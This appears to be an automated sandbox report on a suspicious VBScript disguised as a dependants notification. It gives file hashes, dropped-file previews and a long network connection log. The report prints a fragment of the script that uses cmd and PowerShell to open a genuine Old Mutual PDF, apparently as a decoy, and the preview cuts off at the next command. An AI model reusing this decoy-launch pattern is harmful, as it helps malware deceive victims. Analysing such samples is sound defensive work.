                                                                                                                                              SHA-256:12593063961AC5F4C262F9BBD4DF98CBC7F216590CE23B8EA6F495C1DAC591BC
                                                                                                                                              SHA-512:E5F1D18201C2F7DC88FED4BD8CFB0EEC05F83512A947488E78A61E48FE3D2524CFDA648FED5AED87EC46B8A57B62B3FFB209CD5476C9A9D355879469DE37A31A
                                                                                                                                              Malicious:false
                                                                                                                                              URL:https://www.oldmutual.co.za/favicon.ico
                                                                                                                                              Preview:<!DOCTYPE html>.<html data-html-server-rendered="true" lang="en" data-vue-tag="%7B%22lang%22:%7B%22ssr%22:%22en%22%7D%7D">. <head>. <title> </title><meta name="gridsome:hash" content="9e96232045caecccc3d0a35a9947520e81c78cf9"><meta data-vue-tag="ssr" name="google-site-verification" content="xrUvgzX2k1AWgqdiKqT0ugSWjNwSSE7w9lU2QF7EdsU"><meta data-vue-tag="ssr" name="facebook-domain-verification" content="k5kqrz6e2we7gyh2h56gfcpcln7rph"><meta data-vue-tag="ssr" http-equiv="X-UA-Compatible" content="IE=edge"><meta data-vue-tag="ssr" charset="utf-8"><meta data-vue-tag="ssr" name="generator" content="Gridsome v0.7.14"><meta data-vue-tag="ssr" data-key="viewport" name="viewport" content="width=device-width, initial-scale=1, viewport-fit=cover"><meta data-vue-tag="ssr" data-key="format-detection" name="format-detection" content="telephone=no"><meta data-vue-tag="ssr" name="google-site-verification" content="PY7wyunD0P7mjVCjJNIhZSONqGdouJT4OI3tT5J-tHA"><link data-vue-tag="ssr" rel="icon" t
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:PDF document, version 1.6 (zip deflate encoded)
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):313058
                                                                                                                                              Entropy (8bit):7.489403200507457
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3072:fIS2SsoMIr16Q9wt0I/pK9UW4cAgfmi+gKr116umiFBgKw1AlHCgKP1BSljgKr+g:fn2SVMIrIQ9c0I/s9U1cSrhjwvPnEr+g
                                                                                                                                              MD5:0B46EEFB0F38BAF77484929DD67DB02C
                                                                                                                                              SHA1:DE2CE2981F80DEB18935A2D7C76862D049FE7E2A
                                                                                                                                              SHA-256:496212C9D3B71BF483C6B97E4803E00B46B5F8AE731FE4EAE73F614B41F22163
                                                                                                                                              SHA-512:04A0518619385AC7E64A0B2122038C946A22E6E61A06FE539AB389EEB8C2414BF95A6D15DF2478E02F5733F4F2A8C4981B9D35BDE44C59FCD746B020E4B55172
                                                                                                                                              Malicious:false
                                                                                                                                              URL:https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf
                                                                                                                                              Preview:%PDF-1.6.%......1196 0 obj.<</Filter/FlateDecode/First 418/Length 3681/N 46/Type/ObjStm>>stream..h..Z{o.9..*.....0b7.M`.@.....v.v.7...m.m7FRk[.L|..~E.e..'.L...WU..X/.....[.Im2o\.Ek.Rb.`..........SRGf2/..gRZ...1.l.LZU.......I..F.S....T.;.L..3..u....v:....t<......v.F.dV.t......N..e3.%(+....A.T*GX>+-...,%8t.....Hb|iB `M\...e.......e....=K..=.z.=C.MN....z%.$z..4..P.S..x..SP......i..06N.._...j.\^..&.....7..r.)t....u....@~Z..2....7..._.8Bw..}=.....l.}.9...8.._.=>....^w.YX?..f.^.._..0.1.........r.d.8....dE....U.`...].]/...2.x..B.....<...r.........u...i...wU.I.7....hok.)......:.7M....lA..M...e....u%a.9.y..-......b.-.Rs......}..?./s.J.e.p....<....s....X.L..R.].l........Y.....6c9..Xq[...#..."W..2.cF(...=@....*&....E=_7..Q...qV.rq...p.h..B......^...e........P......[..gP.+_O>.zU..fU...n)...N...C.J.|..W~j......#{y.. ..g".........nQ.....n.S"N.dR.......&.K......i.y.\n.u......9P0.....`.7.Yx.).3}.{p..z.(....:......*...&...e.mpG...3......9.p...3....FA..{...f.0.....
                                                                                                                                              Process:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                              File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):48
                                                                                                                                              Entropy (8bit):4.305255793112395
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:8yzGc7C1RREal:nzGtRV
                                                                                                                                              MD5:6ED2062D4FB53D847335AE403B23BE62
                                                                                                                                              SHA1:C3030ED2C3090594869691199F46BE7A9A12E035
                                                                                                                                              SHA-256:43B5390113DCBFA597C4AAA154347D72F660DB5F2A0398EB3C1D35793E8220B9
                                                                                                                                              SHA-512:C9C302215394FEC0B38129280A8303E0AF46BA71B75672665D89828C6F68A54E18430F953CE36B74F50DC0F658CA26AC3572EA60F9E6714AFFC9FB623E3C54FC
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ERROR:...Description = Initialization failure...
                                                                                                                                              Process:C:\Windows\SysWOW64\PING.EXE
                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):283
                                                                                                                                              Entropy (8bit):4.84674468132717
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:PzXULmWxHLTpUrUDOwUsW3CNcwAFeMmvVOIHJFxMVlmJHaVFlr1Ilr80yn:P+pTpcUqnsTDAFSkIrxMVlmJHaVv1UZy
                                                                                                                                              MD5:0C5350B252EEAAC53344AD1EA0C3CB21
                                                                                                                                              SHA1:B7AF4076D8916706D8370FBA3902D14610ABABB7
                                                                                                                                              SHA-256:B49600A2FAE3809A53FE0D2313053405295B7AC71ED45885FB8AB6D47BBA991B
                                                                                                                                              SHA-512:D404762DFAB7008F43B0B4DD0430C8C866B29CE5C867489EFB94C48165B4F189B1C048154DC1895158200976FC0F8FAABB25C035C701F4334F6D5BC3997E2663
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:..Pinging 1.1.1.1 with 32 bytes of data:..Reply from 1.1.1.1: bytes=32 time=138ms TTL=55....Ping statistics for 1.1.1.1:.. Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 138ms, Maximum = 138ms, Average = 138ms..
                                                                                                                                              File type:ASCII text
                                                                                                                                              Entropy (8bit):5.2993050865440505
                                                                                                                                              TrID:
                                                                                                                                                File name:NOTIFICATION_OF_DEPENDANTS.vbs
                                                                                                                                                File size:937 bytes
                                                                                                                                                MD5:50fb3c05b170951a73f8dd0df24c762c
                                                                                                                                                SHA1:1353a8039e99590cdf9995a7bf06a662fdf4203a
                                                                                                                                                SHA256:07d3cb8a9cfd33b0d7cbf8af107a09952aadbc8a911c1b22bf5aea2619d7ae26
                                                                                                                                                SHA512:ac6fc0827f2ba8b00313d01f8d61c0c867a6ad707548705406a74ebdaa1a961f5a0815895a27cdbeb9f2461020c0f9f892a1e6c4b5073da8b94523f78d8e1459
                                                                                                                                                SSDEEP:24:EC5nX10YJnELIpDe/9u8VKOpiFMpw8sFkvyqFFCvsrqC:j5nl0YJEqylVhpgM9pvjCvs9
                                                                                                                                                TLSH:58110033D9BCA32D16FF85B1D1F223B95F43FB41091064575A39ED1142895A583F638D
                                                                                                                                                File Content Preview:' Define the command to execute .Dim command.command = "cmd /c powershell start-process https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf" .command4 = "cmd /c
                                                                                                                                                Icon Hash:68d69b8f86ab9a86
                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                Dec 16, 2024 09:53:52.883435011 CET49709443192.168.2.1220.198.119.84
                                                                                                                                                Dec 16, 2024 09:53:52.883476973 CET4434970920.198.119.84192.168.2.12
                                                                                                                                                Dec 16, 2024 09:53:52.883563042 CET49709443192.168.2.1220.198.119.84
                                                                                                                                                Dec 16, 2024 09:53:52.884170055 CET49709443192.168.2.1220.198.119.84
                                                                                                                                                Dec 16, 2024 09:53:52.884182930 CET4434970920.198.119.84192.168.2.12
                                                                                                                                                Dec 16, 2024 09:53:54.507277966 CET49673443192.168.2.12173.222.162.60
                                                                                                                                                Dec 16, 2024 09:53:54.507488966 CET49674443192.168.2.12173.222.162.60
                                                                                                                                                Dec 16, 2024 09:53:54.976110935 CET49672443192.168.2.12173.222.162.60
                                                                                                                                                Dec 16, 2024 09:53:55.108175993 CET4434970920.198.119.84192.168.2.12
                                                                                                                                                Dec 16, 2024 09:53:55.108340025 CET49709443192.168.2.1220.198.119.84
                                                                                                                                                Dec 16, 2024 09:53:55.117420912 CET49709443192.168.2.1220.198.119.84
                                                                                                                                                Dec 16, 2024 09:53:55.117433071 CET4434970920.198.119.84192.168.2.12
                                                                                                                                                Dec 16, 2024 09:53:55.117844105 CET4434970920.198.119.84192.168.2.12
                                                                                                                                                Dec 16, 2024 09:53:55.119359016 CET49709443192.168.2.1220.198.119.84
                                                                                                                                                Dec 16, 2024 09:53:55.119414091 CET49709443192.168.2.1220.198.119.84
                                                                                                                                                Dec 16, 2024 09:53:55.119425058 CET4434970920.198.119.84192.168.2.12
                                                                                                                                                Dec 16, 2024 09:53:55.119594097 CET49709443192.168.2.1220.198.119.84
                                                                                                                                                Dec 16, 2024 09:53:55.163335085 CET4434970920.198.119.84192.168.2.12
                                                                                                                                                Dec 16, 2024 09:53:55.782401085 CET4434970920.198.119.84192.168.2.12
                                                                                                                                                Dec 16, 2024 09:53:55.782490015 CET4434970920.198.119.84192.168.2.12
                                                                                                                                                Dec 16, 2024 09:53:55.782661915 CET49709443192.168.2.1220.198.119.84
                                                                                                                                                Dec 16, 2024 09:53:55.783015013 CET49709443192.168.2.1220.198.119.84
                                                                                                                                                Dec 16, 2024 09:53:55.783031940 CET4434970920.198.119.84192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:04.081675053 CET49716443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:04.081712008 CET44349716108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:04.081866026 CET49716443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:04.083173990 CET49717443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:04.083220959 CET44349717108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:04.083300114 CET49717443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:04.083506107 CET49716443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:04.083528996 CET44349716108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:04.083759069 CET49717443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:04.083770037 CET44349717108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:04.111067057 CET49674443192.168.2.12173.222.162.60
                                                                                                                                                Dec 16, 2024 09:54:04.111067057 CET49673443192.168.2.12173.222.162.60
                                                                                                                                                Dec 16, 2024 09:54:04.584250927 CET49672443192.168.2.12173.222.162.60
                                                                                                                                                Dec 16, 2024 09:54:05.800731897 CET44349717108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:05.801078081 CET44349716108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:05.810120106 CET49717443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:05.810148001 CET44349717108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:05.810206890 CET49716443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:05.810235023 CET44349716108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:05.811448097 CET44349717108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:05.811450958 CET44349716108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:05.811552048 CET49716443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:05.811691999 CET49717443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:05.813193083 CET49717443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:05.813299894 CET44349717108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:05.813469887 CET49716443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:05.813594103 CET44349716108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:05.813607931 CET49717443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:05.813621044 CET44349717108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:05.864650011 CET49716443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:05.864667892 CET44349716108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:05.881576061 CET49717443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:05.912385941 CET49716443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:06.371551037 CET49719443192.168.2.12142.250.181.68
                                                                                                                                                Dec 16, 2024 09:54:06.371591091 CET44349719142.250.181.68192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:06.371680975 CET49719443192.168.2.12142.250.181.68
                                                                                                                                                Dec 16, 2024 09:54:06.372703075 CET49719443192.168.2.12142.250.181.68
                                                                                                                                                Dec 16, 2024 09:54:06.372715950 CET44349719142.250.181.68192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:06.427735090 CET44349717108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:06.476402998 CET44349717108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:06.476419926 CET44349717108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:06.476445913 CET44349717108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:06.476459026 CET44349717108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:06.476468086 CET44349717108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:06.476500034 CET49717443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:06.476531982 CET44349717108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:06.476566076 CET44349717108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:06.476577044 CET49717443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:06.476577044 CET49717443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:06.575455904 CET49717443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:06.614335060 CET49716443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:06.655335903 CET44349716108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:06.656709909 CET44349717108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:06.656733036 CET44349717108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:06.656766891 CET44349717108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:06.656786919 CET44349717108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:06.656806946 CET44349717108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:06.656815052 CET44349717108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:06.656995058 CET49717443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:06.656995058 CET49717443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:06.708260059 CET44349717108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:06.708276033 CET44349717108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:06.708295107 CET44349717108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:06.708328009 CET44349717108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:06.708445072 CET49717443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:06.708445072 CET49717443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:06.708465099 CET44349717108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:06.710864067 CET49717443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:06.817552090 CET44349717108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:06.817568064 CET44349717108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:06.817615986 CET44349717108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:06.817681074 CET49717443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:06.817693949 CET44349717108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:06.817737103 CET49717443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:06.851814032 CET44349717108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:06.851852894 CET44349717108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:06.851900101 CET44349717108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:06.851963997 CET49717443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:06.851964951 CET49717443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:06.851964951 CET49717443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:06.851984978 CET44349717108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:06.880631924 CET44349717108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:06.880652905 CET44349717108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:06.880697012 CET44349717108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:06.880747080 CET49717443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:06.880747080 CET49717443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:06.880763054 CET44349717108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:06.900290012 CET44349717108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:06.900306940 CET44349717108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:06.900346994 CET44349717108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:06.900377989 CET49717443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:06.900388002 CET44349717108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:06.900408030 CET49717443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:07.075098991 CET49717443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:07.335150003 CET49720443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:07.335218906 CET44349720108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:07.335294962 CET49720443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:07.335659027 CET49720443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:07.335680962 CET44349720108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:07.361589909 CET44349717108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:07.361609936 CET44349717108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:07.361630917 CET44349717108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:07.361640930 CET44349717108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:07.361681938 CET49717443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:07.361681938 CET44349717108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:07.361701012 CET44349717108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:07.361717939 CET44349717108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:07.361725092 CET49717443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:07.361757994 CET49717443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:07.361767054 CET44349717108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:07.361787081 CET49717443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:07.363327026 CET44349717108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:07.363342047 CET44349717108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:07.363364935 CET44349717108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:07.363373995 CET44349717108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:07.363380909 CET44349717108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:07.363405943 CET44349717108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:07.363415003 CET49717443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:07.363429070 CET44349717108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:07.363497019 CET49717443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:07.363497019 CET49717443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:07.364146948 CET44349717108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:07.364156961 CET44349717108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:07.364187002 CET44349717108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:07.364197969 CET44349717108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:07.364223003 CET49717443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:07.364223003 CET49717443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:07.364231110 CET44349717108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:07.364283085 CET49717443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:07.364860058 CET44349717108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:07.364885092 CET44349717108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:07.364893913 CET44349717108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:07.364964008 CET49717443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:07.364969015 CET44349717108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:07.365071058 CET49717443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:07.366991043 CET44349717108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:07.367012024 CET44349717108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:07.367147923 CET49717443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:07.367156029 CET44349717108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:07.368930101 CET44349717108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:07.368963003 CET44349717108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:07.369010925 CET49717443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:07.369029045 CET44349717108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:07.369136095 CET49717443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:07.369462967 CET49717443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:07.383877993 CET44349717108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:07.383907080 CET44349717108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:07.384237051 CET49717443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:07.384237051 CET49717443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:07.384246111 CET44349717108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:07.385901928 CET44349717108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:07.385936022 CET44349717108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:07.386027098 CET49717443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:07.386027098 CET49717443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:07.386035919 CET44349717108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:07.482300997 CET44349717108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:07.482331038 CET44349717108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:07.482568979 CET49717443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:07.482568979 CET49717443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:07.482582092 CET44349717108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:07.483331919 CET49717443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:07.496973038 CET44349717108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:07.496984005 CET44349717108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:07.497033119 CET44349717108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:07.497070074 CET44349717108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:07.497102976 CET49717443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:07.497102976 CET49717443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:07.497111082 CET44349717108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:07.497231960 CET49717443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:07.513246059 CET44349717108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:07.513269901 CET44349717108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:07.513675928 CET49717443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:07.513689995 CET44349717108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:07.516640902 CET49717443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:07.528366089 CET44349717108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:07.528398037 CET44349717108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:07.528547049 CET49717443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:07.528547049 CET49717443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:07.528558016 CET44349717108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:07.528855085 CET49717443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:07.532820940 CET44349717108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:07.532921076 CET44349717108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:07.532938004 CET49717443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:07.533207893 CET49717443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:07.533449888 CET49717443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:07.533449888 CET49717443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:07.533467054 CET44349717108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:07.533566952 CET49717443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:07.829576969 CET44349708173.222.162.60192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:07.829674959 CET49708443192.168.2.12173.222.162.60
                                                                                                                                                Dec 16, 2024 09:54:08.069441080 CET44349719142.250.181.68192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:08.162024975 CET49719443192.168.2.12142.250.181.68
                                                                                                                                                Dec 16, 2024 09:54:08.325169086 CET49719443192.168.2.12142.250.181.68
                                                                                                                                                Dec 16, 2024 09:54:08.325186968 CET44349719142.250.181.68192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:08.326530933 CET44349719142.250.181.68192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:08.326541901 CET44349719142.250.181.68192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:08.326596022 CET49719443192.168.2.12142.250.181.68
                                                                                                                                                Dec 16, 2024 09:54:08.448484898 CET49719443192.168.2.12142.250.181.68
                                                                                                                                                Dec 16, 2024 09:54:08.508347034 CET49719443192.168.2.12142.250.181.68
                                                                                                                                                Dec 16, 2024 09:54:08.508569002 CET44349719142.250.181.68192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:08.648503065 CET49719443192.168.2.12142.250.181.68
                                                                                                                                                Dec 16, 2024 09:54:08.648516893 CET44349719142.250.181.68192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:08.702584982 CET49721443192.168.2.1220.198.119.84
                                                                                                                                                Dec 16, 2024 09:54:08.702620983 CET4434972120.198.119.84192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:08.702685118 CET49721443192.168.2.1220.198.119.84
